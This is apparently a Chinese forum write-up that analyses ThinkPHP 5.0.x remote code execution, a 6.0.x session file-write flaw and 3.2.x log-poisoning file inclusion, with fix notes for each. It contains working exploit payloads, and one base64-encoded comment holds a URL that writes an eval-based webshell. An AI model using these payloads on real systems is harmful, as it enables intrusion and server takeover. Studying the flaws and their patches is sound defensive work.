<p><img src="https://nc0.cdn.zkaq.cn/md/6508/f5d4000a348a2fe210b6afdc07c0f2cc_43711.png" alt=""></p>
<p>Payload如下，通过POST提交触发漏洞</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">http</span><span class="pun">:</span><span class="com">//localhost/thinkphp/public/index.php</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pln">POST</span><span class="pun">:</span></code></li><li class="L3"><code></code></li><li class="L4"><code><span class="pln">_method</span><span class="pun">=</span><span class="pln">__construct</span><span class="pun">&amp;</span><span class="pln">filter</span><span class="pun">[]=</span><span class="pln">system</span><span class="pun">&amp;</span><span class="pln">server</span><span class="pun">[</span><span class="pln">REQUEST_METHOD</span><span class="pun">]=</span><span class="pln">ls </span><span class="pun">-</span><span class="pln">al</span></code></li></ol></pre><p><img src="https://nc0.cdn.zkaq.cn/md/6508/09e4d3849ee025c0ad0fc8d6736042e5_28412.png" alt=""></p>
<h3 id="h3-0x02-"><a name="0x02 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞分析</h3><p>我们知道可以通过<code>http://localhost/public/index.php?s=index</code>的方式通过<code>s</code>参数传递具体的路由，根据入口文件可以直接跟到URL路由检测函数，关键代码如下：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/61ab4ffe4495591a5d09eda9eb63f423_71018.png" alt=""></p>
<p>可以看到在进入<code>self::exec($dispatch, $config)</code>前，<code>$dispatch</code>的值是通过</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">$dispatch </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">self</span><span class="pun">::</span><span class="pln">routeCheck</span><span class="pun">(</span><span class="pln">$request</span><span class="pun">,</span><span class="pln"> $config</span><span class="pun">)</span></code></li></ol></pre><p>设置的，这时候如果<code>debug</code>模式开启，就会调用<code>$request-&gt;param()</code>，也就是下面<code>exec()</code>中会调用到的函数，经过下面分析就能发现，在<code>debug</code>模式开启时就能直接触发漏洞，原理是一样的。</p>
<p>进入<code>exec()</code>方法：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/79fe7d4267d5ea720c35b16389cca12e_26127.png" alt=""></p>
<p><code>exec()</code>方法根据<code>$dispatch</code>的值选择进入不同的分支，当进入<code>method</code>分支时，调用<code>Request::instance()-&gt;param()</code>方法，跟进<code>param()</code>，看到调用了<code>Request</code>类的<code>method()</code>方法 ：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/7f663385cf7340baf87a78d09ef88649_94387.png" alt=""></p>
<p>跟进<code>method</code>方法，通过官方的更新文档可知该函数是被改进的内容之一，在这个方法中，如果<code>method</code>等于<code>true</code>，则调用<code>$this-&gt;server()</code>方法：：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/7cfb18732582d59c45925d4b7f1d017c_12657.png" alt=""></p>
<p>可见<code>server()</code>方法中调用了<code>input()</code>方法，然后调用<code>filterValue()</code>方法。然后filterValue中调用了<code>call_user_func()</code>方法：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/282c96274192cd4d961b2cbac6057124_64493.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/0e29c16203fddc1cc5de33a684bf3b2e_36857.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/cab68f6fc337145270faed95df03281b_55490.png" alt=""></p>
<p>如果两个参数均可控，即<strong>$filter</strong>和<strong>$value</strong>，则会造成命令执行。</p>
<p>那么观察两个参数：</p>
<p>在getFilter()中设置了$filter值：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">$filter </span><span class="pun">=</span><span class="pln"> $filter </span><span class="pun">?:</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">filter</span><span class="pun">;</span></code></li></ol></pre><p>也即由$this-&gt;filter决定;</p>
<p>$value为第一个参数$data，即为传入数组的值，由$this-&gt;server决定。</p>
<p>$method变量是$this-&gt;method，其同等于POST的”method”参数值由于$this-&gt;method可控，导致可以调用_contruct()覆盖Request类的filter字段。</p>
<h3 id="h3-0x03-"><a name="0x03 漏洞修复" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 漏洞修复</h3><p>官方的修复方法是：在ThinkPHP5.0.24中，增加了对<code>$this-&gt;method</code>的判断，不允许再自由调用类函数。用户应尽快升级版本，并且不要开启debug模式，以免遭受攻击。</p>
<h3 id="h3-0x04-"><a name="0x04 参考资料" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 参考资料</h3><p><a href="https://paper.seebug.org/787/">ThinkPHP5 核心类 Request 远程代码漏洞分析</a></p>
<p><a href="http://blog.nsfocus.net/thinkphp-full-version-rce-vulnerability-analysis/?tdsourcetag=s_pctim_aiomsg">THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析</a></p>
<h2 id="h2-5-thinkphp-v6-0-0-v6-0-1-"><a name="5. ThinkPHP v6.0.0-v6.0.1任意文件写漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>5. ThinkPHP v6.0.0-v6.0.1任意文件写漏洞分析</h2><h3 id="h3-0x00-"><a name="0x00 背景" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x00 背景</h3><p>年初，奇安信发布了 ThinkPHP 6.0 “任意”文件创建漏洞安全风险通告</p>
<p>漏洞影响范围：top-think/framework 6.x &lt; 6.0.2</p>
<h3 id="h3-0x01-"><a name="0x01 漏洞利用" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 漏洞利用</h3><p>首先开启session（重点）：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/b0344de2af92b70cef9835233a8f2fb6_67585.png" alt=""></p>
<p>在控制器文件index.php中加入以下代码，作用是用于获取name参数，并将之设置到session中。</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">use</span><span class="pln"> think\facade\Session</span><span class="pun">;</span></code></li><li class="L1"><code><span class="kwd">public</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> index</span><span class="pun">()</span></code></li><li class="L2"><code><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code><span class="pln"> </span><span class="typ">Session</span><span class="pun">::</span><span class="kwd">set</span><span class="pun">(</span><span class="str">'name'</span><span class="pun">,</span><span class="str">'thinkphp'</span><span class="pun">);</span></code></li><li class="L4"><code><span class="pln"> </span><span class="kwd">return</span><span class="pln"> </span><span class="lit">1</span><span class="pun">;</span></code></li><li class="L5"><code><span class="pln"> </span><span class="pun">}</span></code></li></ol></pre><p><img src="https://nc0.cdn.zkaq.cn/md/6508/1a57b3950fc88ffd708d31961df70d7e_69473.png" alt=""></p>
<p>接下来访问主页，并且抓包修改PHPSESSION：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/8b43fd9f996d3b7a202280e6fdc47b4c_15515.png" alt=""></p>
<p>查看seesion文件夹，已经有php文件存在：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/b892579f76ad5999c5086b42947de698_93773.png" alt=""></p>
<h3 id="h3-0x02-"><a name="0x02 漏洞分析" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞分析</h3><p>参考通告可知是在存储session时导致的文件写入，跟进与session存储有关的函数。在save()方法中，调用了write()方法。</p>
<p>位置：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">D</span><span class="pun">:</span><span class="pln">\phpstudy_pro\WWW\tp6\vendor\topthink\framework\src\think\session\Store</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre><p><img src="https://nc0.cdn.zkaq.cn/md/6508/8cbe6a0d3c71df5b5a4c09f7de68d796_31063.png" alt=""></p>
<p>查看write函数，可见在返回值处调用了writeFiles方法，继续跟进：</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/f0e293839f12470ab599d149314d688c_48689.png" alt=""></p>
<p>可见正是将字符串写文件的函数。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/3393821ee4665f2172529376d43fbdc0_92807.png" alt=""></p>
<p>我们知道在与文件有关的漏洞中，写入文件的文件名、内容和路径是十分重要的。从write方法中可知本次漏洞的文件名来自于sessionid，而此id来自与一个getId方法，在其之上的setId方法中，当$id的长度为32时，便执行$this-&gt;$id赋值。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/1275a5f769d456baeca2d7520dd75a90_99317.png" alt=""></p>
<p>继续跟踪到调用setId方法的位置,此处的cookieName值为PHPSESSION：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">D</span><span class="pun">:</span><span class="pln">\phpstudy_pro\WWW\tp6\vendor\topthink\framework\src\think\middleware\SessionInit</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre><p><img src="https://nc0.cdn.zkaq.cn/md/6508/945d87879a8b5bf8f4068d3795727f42_22132.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/a1994f3a32bef84fde9fcd21e82b19f0_47631.png" alt=""></p>
<p>既然文件名可控，那么文件内容是否可控呢？跟据write方法可知文件内容就是sessData，即写入的内容就是创建session使用的内容。但是session的创建是由实际的后端业务逻辑来决定的，而默认环境下并没有创建session。所以在默认的环境之中，任意写文件是无法实现的。相对的，该漏洞可能造成的任意删除文件操作不需要苛刻的条件。</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/449c7bfb8dd873525bb67dc13a41fdb8_48366.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/6508/0c2dd265609a9031e2fe966164a58df1_68723.png" alt=""></p>
<h3 id="h3-0x03-"><a name="0x03 漏洞修复" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 漏洞修复</h3><p> 在6.0.2中，对session id使用了<code>ctype_alnum()</code>进行了判断，导致无法传递<code>.</code>等特殊字符，从而无法控制session文件为<code>.php</code>后缀。尽快升级到6.0.2版本以上即可。</p>
<h3 id="h3-0x04-"><a name="0x04 总结" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 总结</h3><p> 本次漏洞分析的原理方面并不困难，但是在复现的过程中遇到不少坑。除了要提前开启session，各种错误日志也是很有用的。</p>
<h3 id="h3-0x05-"><a name="0x05 参考资料" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x05 参考资料</h3><p><a href="https://paper.seebug.org/1114/">https://paper.seebug.org/1114/</a></p>
<p><a href="https://blog.csdn.net/zhangchensong168/article/details/104106869">https://blog.csdn.net/zhangchensong168/article/details/104106869</a></p>
<h2 id="h2-6-thinkphp3-2-x-rce-"><a name="6.ThinkPHP3.2.x RCE 漏洞复现" class="reference-link"></a><span class="header-link octicon octicon-link"></span>6.ThinkPHP3.2.x RCE 漏洞复现</h2><h3 id="h3-0x01-"><a name="0x01 简介" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x01 简介</h3><p>ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,为了简化企业级应用开发和敏捷WEB应用开发而诞生,在国内拥有庞大的用户群体，其中不乏关键基础设施用户。</p>
<h3 id="h3-0x02-"><a name="0x02 漏洞概述" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x02 漏洞概述</h3><p>ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控，可导致模板文件路径变量被覆盖为携带攻击代码的文件路径，导致任意文件包含，可执行任意代码。</p>
<h3 id="h3-0x03-"><a name="0x03 影响版本" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x03 影响版本</h3><blockquote>
<p>ThinkPHP3.2.x  </p>
</blockquote>
<h3 id="h3-0x04-"><a name="0x04 复现" class="reference-link"></a><span class="header-link octicon octicon-link"></span>0x04 复现</h3><p>step1: 访问<code>/index.php</code>,burp 抓包，将路径改为<code>/index.php?m=--&gt;&lt;?=phpinfo();?&gt;</code><br><img src="https://nc0.cdn.zkaq.cn/md/814/0709667e510fb0565400a7ea39ecd576_66045.png" alt=""><br>这时目标服务器内将生成一个日志文件，文件名为日期，格式为<code>21_07_27.log</code>，但是日志的保存路径与目标是否开启<code>debug</code>有关:</p>
<blockquote>
<p>开启: Application\Runtime\Logs\Common\&lt;log&gt;<br>关闭: Application\Runtime\Logs\Home\&lt;log&gt;</p>
</blockquote>
<p>step2: 访问如下地址<br><code>index.php?m=Home&amp;c=Index&amp;a=index&amp;value[_filename]=./Application/Runtime/Logs/Common/21_07_27.log</code><br><img src="https://nc0.cdn.zkaq.cn/md/814/1cb3dbf09019296a6323731cf7863437_84889.png" alt="">   </p>
</div>

打赏我,让我更有动力~

2 条回复   |  直到 2021-10-22 | 7882 次浏览

yangroupaomo
发表于 2021-10-21

PHA+6L+Z5Liq6IO95YaZ5Ye65p2lUEhQaW5mb++8jOS4uuS7gOS5iOWGmeS4jei/m+WOu+mprDwvcD4=

评论列表

  • 加载数据中...

编写评论内容

yangroupaomo
发表于 2021-10-22

PHA+PGEgaHJlZj0iaHR0cDovL3RwNS5sYWIyLmFxbGFiLmNuOjgxL3RwNV8wMjIvcHVibGljL2luZGV4LnBocD9zPS9JbmRleC9cdGhpbmtcYXBwL2ludm9rZWZ1bmN0aW9uJmFtcDtmdW5jdGlvbj1jYWxsX3VzZXJfZnVuY19hcnJheSZhbXA7dmFyc1swXT1maWxlX3B1dF9jb250ZW50cyZhbXA7dmFyc1sxXVtdPWFhYTMucGhwJmFtcDt2YXJzWzFdW109JTNDP3BocCUyMGV2YWwoJF9QT1NUWzg4OF0pOz8lM0UiPmh0dHA6Ly90cDUubGFiMi5hcWxhYi5jbjo4MS90cDVfMDIyL3B1YmxpYy9pbmRleC5waHA/cz0vSW5kZXgvXHRoaW5rXGFwcC9pbnZva2VmdW5jdGlvbiZhbXA7ZnVuY3Rpb249Y2FsbF91c2VyX2Z1bmNfYXJyYXkmYW1wO3ZhcnNbMF09ZmlsZV9wdXRfY29udGVudHMmYW1wO3ZhcnNbMV1bXT1hYWEzLnBocCZhbXA7dmFyc1sxXVtdPSUzQz9waHAlMjBldmFsKCRfUE9TVFs4ODhdKTs/JTNFPC9hPjxicj7kuLrku4DkuYjmiJHmnoTpgKDnmoTor63lj6XmiafooYzkuI3miJDlip/jgII8L3A+

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.